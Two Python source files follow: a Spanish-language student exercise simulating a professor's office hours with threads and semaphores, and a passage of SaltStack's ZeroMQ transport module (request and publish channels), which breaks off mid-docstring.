""" Un profesor de la facultad asesora a varios estudiantes y estamos en su horario de atencion Mision: modelar la interaccicon durante este horario de modo que la espera (para todos) sea lo mas corta posible * Un profesor tiene x sillas en su cubiculo - Cuando no hay alumnos que atender, las sillas sirven como sofa, y el profesor se acuesta a dormir la siesta * Los alumnos pueden tocar a su puerta en cualquier momento, pero no pueden entrar mas de x alumnos * Para evitar coinfundir al profesor, solo un alumno puede presentar su duda (y esperar a su respuesta) al mismo tiempo. * Los demas alumnos sentados deben esperar pacientemente su turno * Cada alumno puede preguntar desde 1 y hasta 'y' preguntas (permitiendo que los demas alumnos pregunten entre una y otra) DEFINICIONES PROPIAS: 1. La probabilidad de llegada de un alumno es de 0.5 2. Pueden entrar al cubiculo una vez que se hayan juntado 3 alumnos 3. se manejaran un maximo de 5 dudas por alumno por fines visualizacion en la ejecucion """ import threading import time import random alumnos_sentados = [] mutex = threading.Semaphore(1) barrera = threading.Semaphore(0) contador_alumnos = 0 def alumno(id): global mutex, barrera, contador_alumnos #llego un alumno if len(alumnos_sentados) < 5: #verifica si tiene espacio en el cubiculo mutex.acquire() print('\033[;37malumno sentadito: \033[;36m'+ str(id) ) alumnos_sentados.append(id) contador_alumnos += 1 mutex.release() barrera.release() else: #si no hay lugar se duerme y espera a que se desocupe print(f"\033[;37malumno \033[;36m{id} \033[;37mdice: no hay lugar mejor me duermo") time.sleep(random.random()) pass def profesor(): global mutex, barrera, contador_alumnos while True: print("\033[;33mESPERANDO A QUE SE JUNTEN ALUMNOS") print(f"\033[;35mHAY {contador_alumnos} ALUMNOS EN ESPERA") #verifica si hay alumnos esperando ser atendidos if contador_alumnos >= 3: # pasa grupo de 3 alumnos print(f"\033[;32mPASANDO GRUPO DE {contador_alumnos} ALUMNOS") barrera.acquire() while alumnos_sentados: # mientras haya alumnos en su cubiculo a = alumnos_sentados.pop() # atendemos las dudas del primer alumno contador_alumnos -= 1 for duda in range(random.randint(1,5)): print(f'\033[;37mATENDIENDO SU DUDA # \033[;31m{duda} \033[;37mALUMNO \033[;36m{a}') time.sleep(random.random()) else: print('\033[;37mMIMIDO, NO MOLESTAR') #si no se ha juntado grupo de alumnos el profesor duerme time.sleep(5) threading.Thread(target = profesor).start() id = 0 while True: threading.Thread(target=alumno,args=[id]).start() id += 1 time.sleep(random.random()) if id >= 10: time.sleep(random.randint(10,15))
zeromq.py
""" Zeromq transport classes """ import errno import hashlib import logging import os import signal import sys import threading from random import randint import salt.auth import salt.crypt import salt.ext.tornado import salt.ext.tornado.concurrent import salt.ext.tornado.gen import salt.ext.tornado.ioloop import salt.log.setup import salt.payload import salt.transport.client import salt.transport.mixins.auth import salt.transport.server import salt.utils.event import salt.utils.files import salt.utils.minions import salt.utils.process import salt.utils.stringutils import salt.utils.verify import salt.utils.versions import salt.utils.zeromq import zmq.error import zmq.eventloop.ioloop import zmq.eventloop.zmqstream from salt._compat import ipaddress from salt.exceptions import SaltException, SaltReqTimeoutError from salt.utils.zeromq import LIBZMQ_VERSION_INFO, ZMQ_VERSION_INFO, zmq try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False try: from M2Crypto import RSA HAS_M2 = True except ImportError: HAS_M2 = False try: from Cryptodome.Cipher import PKCS1_OAEP except ImportError: from Crypto.Cipher import PKCS1_OAEP # nosec log = logging.getLogger(__name__) def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None): """ Return the ZeroMQ URI to connect the Minion to the Master. It supports different source IP / port, given the ZeroMQ syntax: // Connecting using a IP address and bind to an IP address rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0); Source: http://api.zeromq.org/4-1:zmq-tcp """ from salt.utils.zeromq import ip_bracket master_uri = "tcp://{master_ip}:{master_port}".format( master_ip=ip_bracket(master_ip), master_port=master_port ) if source_ip or source_port: if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1): # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6 # which is included in the pyzmq wheels starting with 16.0.1. if source_ip and source_port: master_uri = ( "tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format( source_ip=ip_bracket(source_ip), source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port, ) ) elif source_ip and not source_port: master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format( source_ip=ip_bracket(source_ip), master_ip=ip_bracket(master_ip), master_port=master_port, ) elif source_port and not source_ip: ip_any = ( "0.0.0.0" if ipaddress.ip_address(master_ip).version == 4 else ip_bracket("::") ) master_uri = ( "tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format( ip_any=ip_any, source_port=source_port, master_ip=ip_bracket(master_ip), master_port=master_port, ) ) else: log.warning( "Unable to connect to the Master using a specific source IP / port" ) log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6") log.warning( "Specific source IP / port for connecting to master returner port:" " configuraion ignored" ) return master_uri class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel): """ Encapsulate sending routines to ZeroMQ. 
ZMQ Channels default to 'crypt=aes' """ async_methods = [ "crypted_transfer_decode_dictentry", "_crypted_transfer", "_do_transfer", "_uncrypted_transfer", "send", ] close_methods = [ "close", ] def __init__(self, opts, **kwargs): self.opts = dict(opts) self.ttype = "zeromq" # crypt defaults to 'aes' self.crypt = kwargs.get("crypt", "aes") if "master_uri" in kwargs: self.opts["master_uri"] = kwargs["master_uri"] self._io_loop = kwargs.get("io_loop") if self._io_loop is None: self._io_loop = salt.ext.tornado.ioloop.IOLoop.current() if self.crypt != "clear": # we don't need to worry about auth as a kwarg, since its a singleton self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop) log.debug( "Connecting the Minion to the Master URI (for the return server): %s", self.master_uri, ) self.message_client = AsyncReqMessageClientPool( self.opts, args=( self.opts, self.master_uri, ), kwargs={"io_loop": self._io_loop}, ) self._closing = False def close(self): """ Since the message_client creates sockets and assigns them to the IOLoop we have to specifically destroy them, since we aren't the only ones with references to the FDs """ if self._closing: return log.debug("Closing %s instance", self.__class__.__name__) self._closing = True if hasattr(self, "message_client"): self.message_client.close() # pylint: disable=W1701 def __del__(self): try: self.close() except OSError as exc: if exc.errno != errno.EBADF: # If its not a bad file descriptor error, raise raise # pylint: enable=W1701 @property def master_uri(self): if "master_uri" in self.opts: return self.opts["master_uri"] # if by chance master_uri is not there.. if "master_ip" in self.opts: return _get_master_uri( self.opts["master_ip"], self.opts["master_port"], source_ip=self.opts.get("source_ip"), source_port=self.opts.get("source_ret_port"), ) # if we've reached here something is very abnormal raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts") def _package_load(self, load): return { "enc": self.crypt, "load": load, } @salt.ext.tornado.gen.coroutine def crypted_transfer_decode_dictentry( self, load, dictkey=None, tries=3, timeout=60 ): if not self.auth.authenticated: # Return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() # Return control to the caller. When send() completes, resume by populating ret with the Future.result ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) key = self.auth.get_keys() if "key" not in ret: # Reauth in the case our key is deleted on the master side. yield self.auth.authenticate() ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) if HAS_M2: aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding) else: cipher = PKCS1_OAEP.new(key) aes = cipher.decrypt(ret["key"]) pcrypt = salt.crypt.Crypticle(self.opts, aes) data = pcrypt.loads(ret[dictkey]) data = salt.transport.frame.decode_embedded_strs(data) raise salt.ext.tornado.gen.Return(data) @salt.ext.tornado.gen.coroutine def _crypted_transfer(self, load, tries=3, timeout=60, raw=False): """ Send a load across the wire, with encryption In case of authentication errors, try to renegotiate authentication and retry the method. 
Indeed, we can fail too early in case of a master restart during a minion state execution call :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing """ @salt.ext.tornado.gen.coroutine def _do_transfer(): # Yield control to the caller. When send() completes, resume by populating data with the Future.result data = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) # we may not have always data # as for example for saltcall ret submission, this is a blind # communication, we do not subscribe to return events, we just # upload the results to the master if data: data = self.auth.crypticle.loads(data, raw) if not raw: data = salt.transport.frame.decode_embedded_strs(data) raise salt.ext.tornado.gen.Return(data) if not self.auth.authenticated: # Return control back to the caller, resume when authentication succeeds yield self.auth.authenticate() try: # We did not get data back the first time. Retry. ret = yield _do_transfer() except salt.crypt.AuthenticationError: # If auth error, return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() ret = yield _do_transfer() raise salt.ext.tornado.gen.Return(ret) @salt.ext.tornado.gen.coroutine def _uncrypted_transfer(self, load, tries=3, timeout=60): """ Send a load across the wire in cleartext :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing """ ret = yield self.message_client.send( self._package_load(load), timeout=timeout, tries=tries, ) raise salt.ext.tornado.gen.Return(ret) @salt.ext.tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): """ Send a request, return a future which will complete when we send the message """ if self.crypt == "clear": ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer( load, tries=tries, timeout=timeout, raw=raw ) raise salt.ext.tornado.gen.Return(ret) class AsyncZeroMQPubChannel( salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel ): """ A transport channel backed by ZeroMQ for a Salt Publisher to use to publish commands to connected minions """ async_methods = [ "connect", "_decode_messages", ] close_methods = [ "close", ] def __init__(self, opts, **kwargs): self.opts = opts self.ttype = "zeromq" self.io_loop = kwargs.get("io_loop") self._closing = False if self.io_loop is None: self.io_loop = salt.ext.tornado.ioloop.IOLoop.current() self.hexid = hashlib.sha1( salt.utils.stringutils.to_bytes(self.opts["id"]) ).hexdigest() self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop) self.context = zmq.Context() self._socket = self.context.socket(zmq.SUB) if self.opts["zmq_filtering"]: # TODO: constants file for "broadcast" self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast") if self.opts.get("__role") == "syndic": self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic") else: self._socket.setsockopt( zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid) ) else: self._socket.setsockopt(zmq.SUBSCRIBE, b"") self._socket.setsockopt( zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"]) ) # TODO: cleanup all the socket opts stuff if hasattr(zmq, "TCP_KEEPALIVE"): self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"]) 
self._socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"] ) recon_delay = self.opts["recon_default"] if self.opts["recon_randomize"]: recon_delay = randint( self.opts["recon_default"], self.opts["recon_default"] + self.opts["recon_max"], ) log.debug( "Generated random reconnect delay between '%sms' and '%sms' (%s)", self.opts["recon_default"], self.opts["recon_default"] + self.opts["recon_max"], recon_delay, ) log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay) self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) if hasattr(zmq, "RECONNECT_IVL_MAX"): log.debug( "Setting zmq_reconnect_ivl_max to '%sms'", self.opts["recon_default"] + self.opts["recon_max"], ) self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"]) if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr( zmq, "IPV4ONLY" ): # IPv6 sockets work for both IPv6 and IPv4 addresses self._socket.setsockopt(zmq.IPV4ONLY, 0) if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]: self._monitor = ZeroMQSocketMonitor(self._socket) self._monitor.start_io_loop(self.io_loop) def close(self): if self._closing is True: return self._closing = True if hasattr(self, "_monitor") and self._monitor is not None: self._monitor.stop() self._monitor = None if hasattr(self, "_stream"): self._stream.close(0) elif hasattr(self, "_socket"): self._socket.close(0) if hasattr(self, "context") and self.context.closed is False: self.context.term() # pylint: disable=W1701 def __del__(self): self.close() # pylint: enable=W1701 def __enter__(self): return self def __exit__(self, *args): self.close() # TODO: this is the time to see if we are connected, maybe use the req channel to guess? 
@salt.ext.tornado.gen.coroutine def connect(self): if not self.auth.authenticated: yield self.auth.authenticate() # if this is changed from the default, we assume it was intentional if int(self.opts.get("publish_port", 4506)) != 4506: self.publish_port = self.opts.get("publish_port") # else take the relayed publish_port master reports else: self.publish_port = self.auth.creds["publish_port"] log.debug( "Connecting the Minion to the Master publish port, using the URI: %s", self.master_pub, ) self._socket.connect(self.master_pub) @property def master_pub(self): """ Return the master publish port """ return _get_master_uri( self.opts["master_ip"], self.publish_port, source_ip=self.opts.get("source_ip"), source_port=self.opts.get("source_publish_port"), ) @salt.ext.tornado.gen.coroutine def _decode_messages(self, messages): """ Take the zmq messages, decrypt/decode them into a payload :param list messages: A list of messages to be decoded """ messages_len = len(messages) # if it was one message, then its old style if messages_len == 1: payload = salt.payload.loads(messages[0]) # 2 includes a header which says who should do it elif messages_len == 2: message_target = salt.utils.stringutils.to_str(messages[0]) if ( self.opts.get("__role") != "syndic" and message_target not in ("broadcast", self.hexid) ) or ( self.opts.get("__role") == "syndic" and message_target not in ("broadcast", "syndic") ): log.debug("Publish received for not this minion: %s", message_target) raise salt.ext.tornado.gen.Return(None) payload = salt.payload.loads(messages[1]) else: raise Exception( "Invalid number of messages ({}) in zeromq pubmessage from master".format( len(messages_len) ) ) # Yield control back to the caller. When the payload has been decoded, assign # the decoded payload to 'ret' and resume operation ret = yield self._decode_payload(payload) raise salt.ext.tornado.gen.Return(ret) @property def stream(self): """ Return the current zmqstream, creating one if necessary """ if not hasattr(self, "_stream"): self._stream = zmq.eventloop.zmqstream.ZMQStream( self._socket, io_loop=self.io_loop ) return self._stream def on_recv(self, callback): """ Register a callback for received messages (that we didn't initiate) :param func callback: A function which should be called when data is received """ if callback is None: return self.stream.on_recv(None) @salt.ext.tornado.gen.coroutine def wrap_callback(messages): payload = yield self._decode_messages(messages) if payload is not None: callback(payload) return self.stream.on_recv(wrap_callback) class ZeroMQReqServerChannel( salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel ): def __init__(self, opts): salt.transport.server.ReqServerChannel.__init__(self, opts) self._closing = False self._monitor = None self._w_monitor = None def zmq_device(self): """ Multiprocessing target for the zmq queue device """ self.__setup_signals() self.context = zmq.Context(self.opts["worker_threads"]) # Prepare the zeromq sockets self.uri = "tcp://{interface}:{ret_port}".format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000)) self._start_zmq_monitor() self.workers = self.context.socket(zmq.DEALER) if self.opts["mworker_queue_niceness"] and not salt.utils.platform.is_windows(): log.info( "setting mworker_queue niceness to %d", 
self.opts["mworker_queue_niceness"], ) os.nice(self.opts["mworker_queue_niceness"]) if self.opts.get("ipc_mode", "") == "tcp": self.w_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_workers", 4515) ) else: self.w_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "workers.ipc") ) log.info("Setting up the master communication server") self.clients.bind(self.uri) self.workers.bind(self.w_uri) while True: if self.clients.closed or self.workers.closed: break try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise except (KeyboardInterrupt, SystemExit): break def close(self): """ Cleanly shutdown the router socket """ if self._closing: return log.info("MWorkerQueue under PID %s is closing", os.getpid()) self._closing = True if getattr(self, "_monitor", None) is not None: self._monitor.stop() self._monitor = None if getattr(self, "_w_monitor", None) is not None: self._w_monitor.stop() self._w_monitor = None if hasattr(self, "clients") and self.clients.closed is False: self.clients.close() if hasattr(self, "workers") and self.workers.closed is False: self.workers.close() if hasattr(self, "stream"): self.stream.close() if hasattr(self, "_socket") and self._socket.closed is False: self._socket.close() if hasattr(self, "context") and self.context.closed is False: self.context.term() def pre_fork(self, process_manager): """ Pre-fork we need to create the zmq router device :param func process_manager: An instance of salt.utils.process.ProcessManager """ salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager) process_manager.add_process(self.zmq_device, name="MWorkerQueue") def _start_zmq_monitor(self): """ Starts ZMQ monitor for debugging purposes. :return: """ # Socket monitor shall be used the only for debug # purposes so using threading doesn't look too bad here if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]: log.debug("Starting ZMQ monitor") import threading self._w_monitor = ZeroMQSocketMonitor(self._socket) threading.Thread(target=self._w_monitor.start_poll).start() log.debug("ZMQ monitor has been started started") def post_fork(self, payload_handler, io_loop): """ After forking we need to create all of the local sockets to listen to the router :param func payload_handler: A function to called to handle incoming payloads as they are picked up off the wire :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling """ self.payload_handler = payload_handler self.io_loop = io_loop self.context = zmq.Context(1) self._socket = self.context.socket(zmq.REP) self._start_zmq_monitor() if self.opts.get("ipc_mode", "") == "tcp": self.w_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_workers", 4515) ) else: self.w_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "workers.ipc") ) log.info("Worker binding to socket %s", self.w_uri) self._socket.connect(self.w_uri) salt.transport.mixins.auth.AESReqServerMixin.post_fork( self, payload_handler, io_loop ) self.stream = zmq.eventloop.zmqstream.ZMQStream( self._socket, io_loop=self.io_loop ) self.stream.on_recv_stream(self.handle_message) @salt.ext.tornado.gen.coroutine def handle_message(self, stream, payload): """ Handle incoming messages from underlying TCP streams :stream ZMQStream stream: A ZeroMQ stream. 
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html :param dict payload: A payload to process """ try: payload = salt.payload.loads(payload[0]) payload = self._decode_payload(payload) except Exception as exc: # pylint: disable=broad-except exc_type = type(exc).__name__ if exc_type == "AuthenticationError": log.debug( "Minion failed to auth to master. Since the payload is " "encrypted, it is not known which minion failed to " "authenticate. It is likely that this is a transient " "failure due to the master rotating its public key." ) else: log.error("Bad load from minion: %s: %s", exc_type, exc) stream.send(salt.payload.dumps("bad load")) raise salt.ext.tornado.gen.Return() # TODO helper functions to normalize payload? if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict): log.error( "payload and load must be a dict. Payload was: %s and load was %s", payload, payload.get("load"), ) stream.send(salt.payload.dumps("payload and load must be a dict")) raise salt.ext.tornado.gen.Return() try: id_ = payload["load"].get("id", "") if "\0" in id_: log.error("Payload contains an id with a null byte: %s", payload) stream.send(salt.payload.dumps("bad load: id contains a null byte")) raise salt.ext.tornado.gen.Return() except TypeError: log.error("Payload contains non-string id: %s", payload) stream.send( salt.payload.dumps("bad load: id {} is not a string".format(id_)) ) raise salt.ext.tornado.gen.Return() # intercept the "_auth" commands, since the main daemon shouldn't know # anything about our key auth if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth": stream.send(salt.payload.dumps(self._auth(payload["load"]))) raise salt.ext.tornado.gen.Return() # TODO: test try: # Take the payload_handler function that was registered when we created the channel # and call it, returning control to the caller until it completes ret, req_opts = yield self.payload_handler(payload) except Exception as e: # pylint: disable=broad-except # always attempt to return an error to the minion stream.send("Some exception handling minion payload") log.error("Some exception handling a payload from minion", exc_info=True) raise salt.ext.tornado.gen.Return() req_fun = req_opts.get("fun", "send") if req_fun == "send_clear": stream.send(salt.payload.dumps(ret)) elif req_fun == "send": stream.send(salt.payload.dumps(self.crypticle.dumps(ret))) elif req_fun == "send_private": stream.send( salt.payload.dumps( self._encrypt_private( ret, req_opts["key"], req_opts["tgt"], ) ) ) else: log.error("Unknown req_fun %s", req_fun) # always attempt to return an error to the minion stream.send("Server-side exception handling payload") raise salt.ext.tornado.gen.Return() def __setup_signals(self): signal.signal(signal.SIGINT, self._handle_signals) signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): msg = "{} received a ".format(self.__class__.__name__) if signum == signal.SIGINT: msg += "SIGINT" elif signum == signal.SIGTERM: msg += "SIGTERM" msg += ". Exiting" log.debug(msg) self.close() sys.exit(salt.defaults.exitcodes.EX_OK) def _set_tcp_keepalive(zmq_socket, opts): """ Ensure that TCP keepalives are set as specified in "opts". Warning: Failure to set TCP keepalives on the salt-master can result in not detecting the loss of a minion when the connection is lost or when its host has been terminated without first closing the socket. Salt's Presence System depends on this connection status to know if a minion is "present". 
Warning: Failure to set TCP keepalives on minions can result in frequent or unexpected disconnects! """ if hasattr(zmq, "TCP_KEEPALIVE") and opts: if "tcp_keepalive" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"]) if "tcp_keepalive_idle" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"]) if "tcp_keepalive_cnt" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"]) if "tcp_keepalive_intvl" in opts: zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"]) class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel): """ Encapsulate synchronous operations for a publisher channel """ _sock_data = threading.local() def __init__(self, opts): self.opts = opts self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return salt.ext.tornado.gen.sleep(5) def _publish_daemon(self, log_queue=None): """ Bind to the interface specified in the configuration file """ if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows(): log.info( "setting Publish daemon niceness to %i", self.opts["pub_server_niceness"], ) os.nice(self.opts["pub_server_niceness"]) if log_queue: salt.log.setup.set_multiprocessing_logging_queue(log_queue) salt.log.setup.setup_multiprocessing_logging(log_queue) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000)) if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000)) pub_sock.setsockopt(zmq.LINGER, -1) pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_sock.setsockopt(zmq.LINGER, -1) if self.opts.get("ipc_mode", "") == "tcp": pull_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_publish_pull", 4514) ) else: pull_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "publish_pull.ipc") ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info("Starting the Salt Publisher on %s", pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info("Starting the Salt Puller on %s", pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.debug("Publish daemon getting data from puller %s", pull_uri) package = pull_sock.recv() log.debug("Publish daemon received payload. 
size=%d", len(package)) unpacked_package = salt.payload.unpackage(package) unpacked_package = salt.transport.frame.decode_embedded_strs( unpacked_package ) payload = unpacked_package["payload"] log.trace("Accepted unpacked package from puller") if self.opts["zmq_filtering"]: # if you have a specific topic list, use that if "topic_lst" in unpacked_package: for topic in unpacked_package["topic_lst"]: log.trace( "Sending filtered data over publisher %s", pub_uri ) # zmq filters are substring match, hash the topic # to avoid collisions htopic = salt.utils.stringutils.to_bytes( hashlib.sha1( salt.utils.stringutils.to_bytes(topic) ).hexdigest() ) pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Filtered data has been sent") # Syndic broadcast if self.opts.get("order_masters"): log.trace("Sending filtered data to syndic") pub_sock.send(b"syndic", flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Filtered data has been sent to syndic") # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace( "Sending broadcasted data over publisher %s", pub_uri ) pub_sock.send(b"broadcast", flags=zmq.SNDMORE) pub_sock.send(payload) log.trace("Broadcasted data has been sent") else: log.trace( "Sending ZMQ-unfiltered data over publisher %s", pub_uri ) pub_sock.send(payload) log.trace("Unfiltered data has been sent") except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise except KeyboardInterrupt: log.trace("Publish daemon caught Keyboard interupt, tearing down") # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.close() if pull_sock.closed is False: pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager, kwargs=None): """ Do anything necessary pre-fork. Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager """ process_manager.add_process( self._publish_daemon, kwargs=kwargs, name=self.__class__.__name__ ) @property def pub_sock(self): """ This thread's zmq publisher socket. This socket is stored on the class so that multiple instantiations in the same thread will re-use a single zmq socket. """ try: return self._sock_data.sock except AttributeError: pass def pub_connect(self): """ Create and connect this thread's zmq socket. If a publisher socket already exists "pub_close" is called before creating and connecting a new socket. """ if self.pub_sock: self.pub_close() ctx = zmq.Context.instance() self._sock_data.sock = ctx.socket(zmq.PUSH) self.pub_sock.setsockopt(zmq.LINGER, -1) if self.opts.get("ipc_mode", "") == "tcp": pull_uri = "tcp://127.0.0.1:{}".format( self.opts.get("tcp_master_publish_pull", 4514) ) else: pull_uri = "ipc://{}".format( os.path.join(self.opts["sock_dir"], "publish_pull.ipc") ) log.debug("Connecting to pub server: %s", pull_uri) self.pub_sock.connect(pull_uri) return self._sock_data.sock def pub_close(self): """ Disconnect an existing publisher socket and remove it from the local thread's cache. """ if hasattr(self._sock_data, "sock"): self._sock_data.sock.close() delattr(self._sock_data, "sock") def publish(self, load): """ Publish "load" to minions. This send the load to the publisher daemon process with does the actual sending to minions. 
:param dict load: A load to be sent across the wire to minions """ payload = {"enc": "aes"} crypticle = salt.crypt.Crypticle( self.opts, salt.master.SMaster.secrets["aes"]["secret"].value ) payload["load"] = crypticle.dumps(load) if self.opts["sign_pub_messages"]: master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem") log.debug("Signing data packet") payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"]) int_payload = {"payload": salt.payload.dumps(payload)} # add some targeting stuff for lists only (for now) if load["tgt_type"] == "list": int_payload["topic_lst"] = load["tgt"] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"]) match_ids = _res["minions"] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload["topic_lst"] = match_ids payload = salt.payload.dumps(int_payload) log.debug( "Sending payload to publish daemon. jid=%s size=%d", load.get("jid", None), len(payload), ) if not self.pub_sock: self.pub_connect() self.pub_sock.send(payload) log.debug("Sent payload to publish daemon.") class AsyncReqMessageClientPool(salt.transport.MessageClientPool): """ Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket. """ def __init__(self, opts, args=None, kwargs=None): self._closing = False super().__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def close(self): if self._closing: return self._closing = True for message_client in self.message_clients: message_client.close() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) def __enter__(self): return self def __exit__(self, *args): self.close() # TODO: unit tests! class AsyncReqMessageClient: """ This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial """ def __init__(self, opts, addr, linger=0, io_loop=None): """ Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. 
